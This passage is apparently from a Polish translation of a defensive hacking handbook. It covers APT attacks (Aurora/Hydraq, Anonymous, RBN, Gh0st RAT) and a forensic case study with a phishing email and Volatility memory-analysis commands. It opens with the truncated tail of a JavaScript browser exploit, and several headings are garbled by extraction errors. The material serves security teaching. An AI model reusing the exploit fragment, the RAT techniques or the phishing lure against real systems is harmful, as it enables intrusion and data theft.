xl[i].data = p; }; var t = el.srcElement; } /script span id= sp1 IMG SRC= aaa.gif onload= evl(event) /span /body /html W javascriptowym eksploicie wykorzystano prostą procedurę obliczania sumy CRC (ang. Cyclic Redundancy Checking) z 16 stałymi. Przedstawiono ją poniżej. unsigned cal_crc(unsigned char *ptr, unsigned char len) { unsigned int crc; unsigned char da; unsigned int crc_ta[16]={ 0x0000,0x1021,0x2042,0x3063,0x4084,0x50a5,0x60c6,0x70e7, 0x8108,0x9129,0xa14a,0xb16b,0xc18c,0xd1ad,0xe1ce,0xf1ef, } crc=0; while(len--!=0) { da=((uchar)(crc/256))/16; crc =4; crc^=crc_ta[da^(*ptr/16)]; da=((uchar)(crc/256))/16; crc =4; crc^=crc_ta[da^(*ptr 0x0f)]; ptr++; } return(crc); } Niektórzy analitycy uważają, że kod metody wskazuje na to, iż jej autorem jest chińskojęzyczny programista. Pomysł ten oparto na dwóch ważnych odkryciach: (1) kod obliczania sumy CRC przypuszczalnie pochodzi z pracy opublikowanej w uproszczonym chińskim; (2) sześć umieszczonych w kodzie powiązanego trojana adresów IP, z których wysyłano instrukcje i kontrolowano system, służyło do uzy- skiwania zdalnego dostępu i zarządzania przejętymi komputerami połączonymi Kup książkęPoleć książkę Rozdziaï 6. CyberprzestÚpstwa i ataki APT 381 z maszynami z Tajwanu (choć nie z Chin). Niektórzy analitycy podważali te dowody, a zwłaszcza pierwszy z nich, ponieważ zastosowanej techniki używano w algorytmach w programach osadzonych przynajmniej od końca lat 80. ubiegłego wieku. Wykorzy- stano ją nawet jako wzorcową metodę programowania NetBIOS-a. Więcej informacji na ten temat znajdziesz na stronie www.amazon.com/Programmers-Guide-Netbios- -David-Schwaderer/dp/0672226383/ref=pd_sim_b_1. Omawiane szkodliwe oprogra- mowanie zostało nazwane Hydraq. Napisano też sygnatury, które pozwalają wykrywać je w programach antywirusowych. Luka w przeglądarce Internet Explorer umożliwiła napastnikom automatyczne umieszczanie na komputerach ofiar trojanów pobierających inne programy, które wykorzystywały uprawnienia przeglądarki do pobierania i instalowania (oraz kon- figurowania) trojana z „furtką” — narzędzia RAT (ang. Remote Administration Tool). RAT umożliwiał napastnikom dostęp do systemu przez szyfrowane połączenie SSL. Następnie napastnicy przeprowadzili rekonesans sieci, zdobyli dane uwierzytel- niające z katalogu Active Directory, wykorzystali je do uzyskania dostępu do kom- puterów i udziałów sieciowych z własnością intelektualną oraz tajemnicami han- dlowymi, a następnie wyprowadzili te dane. Wszystko to trwało kilka miesięcy, przez które grupa nie została wykryta. Adresy komputerów, które były źródłem ukierun- kowanego phishingu i programów pobierających trojany, wskazywały na Tajwan, natomiast połączenia typu C C (ang. Command and Control) do trojana z „furtką” pochodziły z dwóch chińskich szkół. Każda z tych szkół była pod pewnymi wzglę- dami konkurencją dla amerykańskich organizacji, które padły ofiarą ataku (np. dla firmy Google), jednak nie udało się znaleźć dowodów na to, że akcja była finanso- wana lub wspomagana przez chiński rząd albo przemysł. Inne powszechnie opisywane ataki APT, w tym „Night Dragon” z 2010 roku, „RSA Breach” z 2011 roku i „Shady RAT”, były prowadzone przez kilka lat. Obej- mowały podobne namierzanie celów. Do przeprowadzenia rekonesansu i wyprowadze- nia poufnych danych zastosowano ukierunkowany phishing z użyciem e-maili, wyko- rzystywanie luk w aplikacjach, szyfrowane połączenia i narzędzia RAT z „furtkami”. Wzorzec ten jest charakterystyczny dla ataków APT. Zwykle są one proste (choć gdy jest to konieczne, stosuje się zaawansowane techniki), a po udanym włamaniu napastnicy niewykryci działają przez kilka miesięcy lub lat. Często za źródło ataków uznaje się Chiny, choć raporty chińskiego rządu i chińskiego oddziału organizacji CERT wskazują na to, że to właśnie chiński przemysł i rząd najczęściej są celem napast- ników. Niezależnie od tego, czy ataki są prowadzone z Chin, Indii, Pakistanu, Malezji, Korei, Zjednoczonych Emiratów Arabskich, Rosji, Stanów Zjednoczonych, Meksyku czy Brazylii (kraje te podaje się jako źródła połączeń C C w operacjach APT), w atakach APT utalentowani hakerzy uzyskują dostęp do systemów, a następnie namierzają i wyprowadzają poufne informacje wykorzystywane w konkretnym celu. Kup książkęPoleć książkę 382 Vademecum hackingu. Skuteczna obrona sieci przed atakami Grupa Anonymous Popularność Łatwość przeprowadzenia Szkodliwość Ocena zagrożenia 6 5 7 6 Anonymous to powstała w 2011 roku zaawansowana grupa hakerów, która zade- monstrowała, że potrafi się zorganizować w celu namierzenia komputerów rządowych i korporacyjnych oraz złamania ich zabezpieczeń. Grupa ta z powodzeniem przepro- wadziła ataki przez odmowę usługi na banki, spenetrowała jednostki rządowe (miej- skie, stanowe, krajowe oraz międzynarodowe) i wykradła poufne dane, a także ujaw- niła te informacje, co miało bardzo poważne skutki. Przejęte dane dotyczyły m.in. tożsamości pracowników i menedżerów oraz szczegółów na temat związków między firmami i agencjami rządowymi. Anonymous to luźno powiązana grupa (lub zbiór grup) o częściowo pokrywają- cych się interesach, która potrafi zorganizować się na potrzeby osiągania różnych celów — od handlowych (ujawnianie kompromitujących szczegółów na temat powią- zań biznesowych) po społeczne (ujawnianie korupcji lub zakłócanie pracy rządu, a także ułatwianie i koordynowanie komunikacji oraz działań zainteresowanych obywateli). Grupa stosuje rozmaite techniki hakerskie, m.in. wstrzykiwanie kodu w SQL-u, skrypty XSS i wykorzystywanie luk w usługach sieciowych, a także metody inżynierii społecznej, w tym ukierunkowany phishing i podawanie się za pracowników firmy (np. pracowników pomocy technicznej) w celu uzyskania danych uwierzytel- niających. Członkowie grupy są bardzo pomysłowi i skuteczni. Ich głównym celem jest ujawnianie informacji, a nie zdobywanie dzięki nim przewagi konkurencyjnej lub korzyści finansowych. Grupa infiltruje też sieci komputerowe, a nawet instaluje „furtki”, które może w przyszłości wykorzystać. Ponieważ Anonymous reprezentuje interesy społeczne, celem jej członków jest pokazanie, że niewielka grupa może mieć duży wpływ przez zakłócanie pracy serwi- sów lub ujawnianie poufnych informacji. Sukcesy tej grupy są nagłaśniane, a porażki są niemożliwe do wykrycia. Wynika to z tego, że jej działania są rozproszone i przy- pominają pracę zautomatyzowanych lub ręcznych skanerów oraz próby penetracji, na które sieci firmowe są nieustannie narażone. Zdaniem wielu osób grupa Anonymous nie przeprowadza ataków APT, ponieważ jej akcje często mają na celu uszkodzenie witryny lub zablokowanie dostępu do serwisu. Jednak działania te nieraz mają odciągać uwagę od innych operacji. Kilka głośnych akcji grupy Anonymous wobec agencji rządowych i firm z listy Fortune 500 obejmo- Kup książkęPoleć książkę Rozdziaï 6. CyberprzestÚpstwa i ataki APT 383 wało ataki typu DDoS na witryny (rysunek 6.1) i włamania na komputery połączone z wyprowadzeniem poufnych informacji. Uzyskane dane często są ujawniane na publicznych forach i udostępniane dziennikarzom w celu wzbudzenia sensacji. Rysunek 6.1. Grupa Anonymous wykorzystaïa narzÚdzie LOIC (ang. Low Orbit Ion Cannon) do przeprowadzenia ataków DDoS na przeciwników serwisu WikiLeaks RBN Popularność Łatwość przeprowadzenia Szkodliwość Ocena zagrożenia 5 5 7 6 RBN (ang. Russian Business Network) to grupa przestępcza skupiająca firmy i orga- nizacje. Wcześniej działała w Sankt Petersburgu, a obecnie dzięki partnerom rozprze- strzeniła się na wiele innych państw i prowadzi działalność na skalę międzynaro- dową. Grupa zarządza kilkoma botnetami, które wynajmuje, rozsyła spam, stosuje phishing, rozpowszechnia szkodliwe oprogramowanie i zajmuje się hostingiem płat- nych witryn pornograficznych (także z pornografią dziecięcą i z fetyszami). Botnety zarządzane przez grupę RBN lub powiązane z nią działają w uporządkowany sposób. Służą do kradzieży tożsamości i środków finansowych oraz wykorzystują bardzo zaawansowane szkodliwe oprogramowanie do utrwalenia swojej obecności na kom- puterach ofiar. Kup książkęPoleć książkę 384 Vademecum hackingu. Skuteczna obrona sieci przed atakami Szkodliwe oprogramowanie stosowane przez RBN jest zwykle bardziej zaawan- sowane niż narzędzia używane w atakach APT. Oprogramowanie to często służy do bezpośredniego osiągania celów liderów grupy, a ponadto zapewnia abonentom plat- formę do prowadzenia innych działań (botnety można wykorzystać np. do przeprowa- dzenia ataków DDoS i jako systemy pośredniczące w połączeniach w atakach APT). RBN jest przykładem zorganizowanej działalności przestępczej, jednak nie jest to jedyna grupa tego typu. Cyberprzestępcy (zarówno stowarzyszeni z RBN, jak i nieza- leżni) wykorzystują RBN jako model, a ich sieci przez cały 2011 rok ułatwiały ataki APT innym grupom. Ułatwianie dostępu do przejętych systemów jest przykładem działań z obszaru APT. CZYM ATAKI APT NIE Sk? Równie ważne jak zrozumienie, czym są ataki APT, jest ustalenie, czym one nie są. Opisane wcześniej techniki są stosowane zarówno w atakach APT, jak i przez innych napastników, którzy są zainteresowani (często z uwagi na dostrzeżoną okazję) zakłó- ceniem pracy firmy, sabotażem, a nawet działalnością przestępczą. APT nie jest ani konkretnym szkodliwym programem, ani zestawem szkodliwego oprogramowania, ani określoną czynnością. Ataki APT to skoordynowane i szeroko zakrojone działania, które mają pozwolić osiągnąć konkretny cel (związany z konku- rencją, finansami, reputacją itd.). PRZYK’ADOWE POPULARNE NARZ}DZIA I TECHNIKI Z OBSZARU APT Aby opisać ataki APT i sposoby ich wykrywania, w dalszych podpunktach przedsta- wiamy przykładowe narzędzia i techniki wykorzystane w kilku tego rodzaju atakach. Atak za pomocÈ narzÚdzia Gh0st Popularność 9 Łatwość przeprowadzenia 10 9 Szkodliwość Ocena zagrożenia 9 Narzędzie RAT o nazwie Gh0st, używane w atakach Gh0stnet w latach 2008 – 2010, to znany przykład szkodliwego oprogramowania stosowanego w atakach APT. 29 marca 2009 roku w serwisie Information Warfare Monitor (IWM; www.infowar-monitor.net/about/) opublikowano dokument zatytułowany Tracking Kup książkęPoleć książkę Rozdziaï 6. CyberprzestÚpstwa i ataki APT 385 Gh0stNet — Investigation of a Cyber Espionage Network (www.infowar-monitor.net/ research/). Dokładnie opisano w nim szczegółowe badania śledcze związane z atakiem (i włamaniem) na systemy komputerowe Prywatnego Biura Dalajlamy, tybetańskiego rządu na uchodźstwie i kilku innych tybetańskich organizacji. Po dziesięciu miesiącach żmudnych badań zespół utalentowanych „cyberdetektywów” stwierdził, że źródłem ataków były Chiny, a do włamania do systemów ofiar wykorzystano zaawansowane szkodliwe oprogramowanie — narzędzie RAT o nazwie Gh0st. Na rysunku 6.2 przed- stawiono program do wydawania poleceń z tego narzędzia, a w tabeli 6.1 opisano możliwości Gh0sta. Pora pokrótce omówić jego najważniejsze funkcje. Rysunek 6.2. Ekran do wydawania poleceñ i sprawowania kontroli w Gh0Ăcie W poniedziałkowy poranek w listopadzie Charles otworzył swoją skrzynkę pocztową. Musiał zapoznać się z długą listą e-maili, skończyć jakąś papierkową robotę i wziąć udział w dwóch spotkaniach w dziale finansów. W trakcie odpowiadania na wiadomości Charles zauważył, że jedna z nich była zaadresowana do działu finansów. Dotyczyła pewnej błędnie przeprowadzonej transakcji finansowej. W wiadomości znajdował się odnośnik do raportu na temat błędu. Charles kliknął odnośnik, ale zamiast zobaczyć raport, ujrzał białą stronę z tekstem „Proszę czekać. Ładowanie w toku”. Po zamknięciu przeglądarki Charles ponownie zajął się pracą i zapomniał o nieudanym transferze pliku. Gdy po spotkaniach wrócił do biurka, okazało się, że komputer zniknął. Pojawiła się za to notatka od działu bez- pieczeństwa. Wyjaśniono w niej, że maszyna była źródłem podejrzanych danych. W międzyczasie zatrudniono śledczego do zbadania tej sprawy i pomocy przy niej… Kup książkęPoleć książkę 386 Vademecum hackingu. Skuteczna obrona sieci przed atakami Funkcja Usuwanie istniejących rootkitów Menedżer plików Kontrolowanie ekranu Eksplorator procesów Rejestrator wciśnięć klawiszy Zdalny terminal Przechwytywanie sygnału z kamery Śledzenie dźwięku Łamanie kont z dostępem wdzwanianym Zdalne wygaszanie ekranu Zdalne blokowanie urządzeń wejścia Zarządzanie sesją Zdalne pobieranie plików Opis Usuwanie z tablicy SSDT (ang. System Service Descriptor Tables) wszystkich istniejących „haków” Kompletny menedżer plików z hostów lokalnych i zdalnych Pełna kontrola nad zdalnym ekranem Kompletna lista wszystkich aktywnych procesów i otwartych okien Rejestrowanie wciśnięć klawiszy na zdalnym komputerze (w czasie rzeczywistym i w trybie offline) Zdalna powłoka ze wszystkimi funkcjami Przekaz na żywo sygnału z kamery (jeśli jest dostępna) Przekaz na żywo dźwięku z zainstalowanego mikrofonu (jeśli jest dostępny) Wyświetlanie kont (wraz z hasłami) mających dostęp wdzwaniany Wygaszanie ekranu na przejętym hoście (komputer staje się bezużyteczny) Blokowanie myszy i klawiatury w przejętym hoście Zdalne zamykanie i ponowne uruchamianie hosta Możliwość pobierania plików binarnych z internetu na zdalny host Konfigurowalne ustawienia serwera w niestandardowym pliku binarnym Tworzenie niestandardowego serwera Gh0st Tabela 6.1. MoĝliwoĂci Gh0sta (dziÚki uprzejmoĂci Michaela Spohna z Foundstone Professional Services) Kup książkęPoleć książkę Rozdziaï 6. CyberprzestÚpstwa i ataki APT 387 Szkodliwe e-maile Po rozmowie z Charlesem i wieloma innymi osobami stało się jasne, że każdy z pra- cowników kliknął adres URL z e-maila. Na szczęście była dostępna treść wiadomości. Od: Jessica Long [mailto:administrateur@hacme.com] Wysłano: Poniedziałek, 19 grudnia 2011, 09:36 Do: US_ALL_FinDPT Temat: Nieudana transakcja bankowa Komunikat został wysłany w związku z płatnością bankową nr 012832113749 wysłaną niedawno z Pana konta. Obecny status transakcji to: „nieudana z powodu błędu technicznego”. Prosimy zapoznać się z poniższym raportem w celu uzyskania dodatkowych informacji: http://finiancialservicesc0mpany.de/index.html Z poważaniem Jessica Long Stowarzyszenie Płatności Elektronicznych — dbamy o bezpieczeństwo Waszych transakcji W trakcie analizowania e-maili śledczych zdziwiło, że firma z siedzibą w Stanach Zjednoczonych używała niemieckiego adresu URL (z przyrostkiem .de) do dostar- czania raportów na temat nieudanych transakcji finansowych. Następny krok polegał na szukaniu śladów w nagłówkach e-maila. US_ALL_FinDPT @commercialcompany.com ; Mon, 19 Dec 2011 09:36:07 Received:EmailServer_commcomp.comt (x.x.x.x.) by ObiWanbmailplanet.com (10.2.2.1) with Microsoft SMTP Server id 10.1.1.1; Mon, 16 Dec 2011 09:35:21 Received: from unknown (HELO arlch) ([6x.8x.6x.7x]) by ObiWanmailplanet.com with ESMTP; Mon, 19 Dec 2011 09:34:19 Za pomocą zapytań WHOIS oraz narzędzi Robtex Swiss Army Knife Internet Tool (www.robtex.com) i PhishTank (www.phishtank.com) śledczy odkrył, że adres IP pochodził z Niemiec i znajdował się na kilku czarnych listach adresów używanych do rozsyłania spamu. Oznaki wïamania Szkodliwe oprogramowanie niezależnie od tego, czy jest używane w atakach APT, czy w standardowy sposób, powinno przetrwać ponowne uruchomienie systemu. Wyko- rzystuje się do tego różne mechanizmy: Kup książkęPoleć książkę 388 Vademecum hackingu. Skuteczna obrona sieci przed atakami x rozmaite węzły Run w rejestrze, x tworzenie usług, x podłączanie się do istniejących usług, x wykorzystanie zaplanowanych zadań, x ukrywanie komunikacji jako normalnego ruchu, x zastępowanie głównego rekordu rozruchowego, x zastępowanie BIOS-a systemu. W trakcie analiz podejrzanego systemu śledczy posługują się technikami badaw- czymi i procedurami reagowania na incydenty. Właściwy sposób reagowania na incy- denty jest oparty na stopniu zmienności danych, co opisano w dokumencie RFC 3227 (ietf.org/rfc/rfc3227.txt). Podano w nim kolejność, w której należy zbierać dowody. Związana jest ona ze zmiennością danych. x Pamięć. x Plik stronicowania lub wymiany. x Informacje o działających procesach. x Dane dotyczące sieci, np. porty oczekujące na pakiety lub istniejące połączenia z innymi systemami. x Rejestr systemu (jeśli istnieje). x Pliki dzienników systemowych lub aplikacji. x Obraz dysków utworzony na potrzeby analiz. x Nośniki ze zarchiwizowanymi danymi. Aby zbadać maszynę, do której się włamano, przygotuj pakiet różnych narzędzi. W trakcie analiz ważne jest to, żeby nie zniszczyć dowodów. Narzędzia stosowane przy reagowaniu na incydenty należy skopiować na płytę CD i zewnętrzne nośniki pamięci masowej. W omawianej sytuacji analitycy wykorzystali narzędzia z pakietu Sysinternals i narzędzia do zastosowań śledczych: x AccessData FTK Imager, x Sysinternals Autoruns, x Sysinternals Process Explorer, x Sysinternals Process Monitor, x WinMerge, x Currports, x Sysinternals Vmmap. Uwaga Waĝne jest to, ĝe te narzÚdzia zapisane na pïycie CD potrafiÈ dziaïaÊ samodzielnie. Kup książkęPoleć książkę Rozdziaï 6. CyberprzestÚpstwa i ataki APT 389 Rejestrowanie zawartoĂci pamiÚci Gdy badania przeprowadza się zgodnie z poziomem zmienności danych, należy za- cząć od wykonania zrzutu pamięci z zaatakowanego komputera i wyeksportować go do zewnętrznego urządzenia z pamięcią masową. Zrzut może przydać się do analiz szkodliwego oprogramowania prowadzonych za pomocą narzędzia Volatility Frame- work Tool. W programie FTK Imager wybierz opcję File/Capture Memory, czego efekt pokazano na rysunku 6.3. Wskaż zewnętrzne urządzenie z pamięcią masową jako ka- talog wyjściowy, nadaj zrzutowi nazwę podobną do nazwazainfekowanejmaszyny.mem i kliknij przycisk Capture Memory, żeby wykonać zrzut. Rysunek 6.3. Tworzenie migawki pamiÚci zainfekowanego systemu Analizy pamięci mają miejsce po zebraniu wszystkich dowodów. Dostępnych jest kilka narzędzi do analizowania pamięci — m.in. FDPro i Responder Pro firmy HBGary, Mandian Memoryze i The Volatility Framework (www.volatilesystems.com/ default/volatility). Każde z nich potrafi wyodrębnić z migawek pamięci związane z procesami dane, np. wątki, łańcuchy znaków, zależności i połączenia. Wspomniane narzędzia służą do analizy migawek pamięci, a także powiązanych plików systemu operacyjnego Windows (Pagefile.sys i Hiberfil.sys). Analizy pamięci są bardzo istotnym aspektem badań ataków APT, ponieważ wiele narzędzi i metod stosowanych przez napastników jest opartych na wstrzykiwaniu kodu do procesów i innych technikach Kup książkęPoleć książkę 390 Vademecum hackingu. Skuteczna obrona sieci przed atakami zaciemniania. Jednak analiza pamięci pozwala poradzić sobie z tymi sztuczkami, ponieważ pliki i połączenia muszą zostać odszyfrowane w korzystających z nich pro- cesach systemu operacyjnego. Uwaga Ciekawe jest znakomite omówienie krok po kroku analiz pamiÚci trojana R2D2 (nazywanego teĝ Bundestrojanem; uĝyto go w sïynnym ataku APT omawianym w mediach w Niemczech w 2011 roku). Znajdziesz je na stronie www.evild3ad.com/1136/volatility-memory-forensics-federal-trojan-aka-r2d2/. Plik stronicowania (wymiany). Pamięć wirtualna używana przez system operacyjny Windows jest przechowywana w pliku Pagefile.sys, który znajduje się w głównym katalogu dysku C:. Gdy pamięć fizyczna zostaje wyczerpana, system w razie potrzeby wymienia pamięć procesów. Plik stronicowania może zawierać cenne informacje na temat infekcji szkodliwym oprogramowaniem lub ukierunkowanych ataków. Także plik Hyberfil.sys obejmuje dane z pamięci, zapisywane po przejściu systemu w stan hibernacji. Analitycy mogą znaleźć tu dodatkowe dane. Plik ten standardo- wo jest ukryty i używany przez system operacyjny. Za pomocą narzędzia FTK Manager można skopiować wspomniane pliki do urzą- dzenia z dowodami, co pokazano na rysunkach 6.4 i 6.5. Po kliknięciu pliku stroni- cowania prawym przyciskiem myszy można go wyeksportować na takie urządzenie. Warto pamiętać, że lepiej jest utworzyć obraz dysku zainfekowanego lub podejrzanego komputera, jednak nie zawsze jest to praktyczne rozwiązanie. Wtedy plan reago- wania na incydenty (taki jak opisany w tym rozdziale) pomaga zebrać ważne dane i artefakty, przydatne do powstrzymania i pozbycia się napastników oraz zareagowa- nia na ich działania. Przydatny proces analizowania zapisanych plików z zawartością pamięci opracowano w ramach projektu The Sandman Project (sandman.msuiche. net/docs/SandMan_Project.pdf). Rysunek 6.4. Zapisywanie plików z zawartoĂciÈ pamiÚci w aktywnym systemie Kup książkęPoleć książkę Rozdziaï 6. CyberprzestÚpstwa i ataki APT 391 Rysunek 6.5. Eksportowanie pliku pagefile.sys Analizowanie pamiÚci. Do analizowania plików ze zrzutem pamięci można zastosować wspomniane wcześniej oprogramowanie o otwartym dostępie do kodu źródłowego — The Volatility Framework Tool. Najpierw należy zidentyfikować obraz: $ python vol.py -f /home/imegaofmemdump.mem imageinfo Następnie trzeba pobrać procesy: $ python vol.py -f /home/imegaofmemdump.mem pslist Teraz można sprawdzić połączenia sieciowe: $ python vol.py -f /home/imegaofmemdump.mem connscan Kup książkęPoleć książkę 392 Vademecum hackingu. Skuteczna obrona sieci przed atakami Jak widać,
Pobierz darmowy fragment (pdf)

Gdzie kupić całą publikację:

Vademecum hackingu. Skuteczna obrona sieci przed atakami. Wydanie VII
Autor:
, ,

Opinie na temat publikacji:


Inne popularne pozycje z tej kategorii:


Czytaj również:


Prowadzisz stronę lub blog? Wstaw link do fragmentu tej książki i współpracuj z Cyfroteką: